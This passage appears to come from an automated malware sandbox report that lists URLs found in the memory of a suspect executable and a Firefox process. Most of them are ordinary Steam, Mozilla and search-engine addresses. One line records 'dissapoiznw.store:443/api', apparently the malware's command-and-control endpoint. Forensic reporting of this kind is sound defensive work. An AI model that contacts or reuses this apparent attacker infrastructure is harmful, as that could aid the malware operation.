Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/s
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/sh
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/cssvsT
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/pun
Source: firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001D.00000002.2175868045.000001C96836D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F08A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2051677031.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2041476436.000001C96F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001D.00000002.2122168164.000001C957211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C957230000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001D.00000003.2074345700.000001C968996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/api
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2094028920.000001C9686CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96884F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C9688AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2110617616.000001C9686CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2112334104.0000003BA85D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963443000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsSELEC
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C96944B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
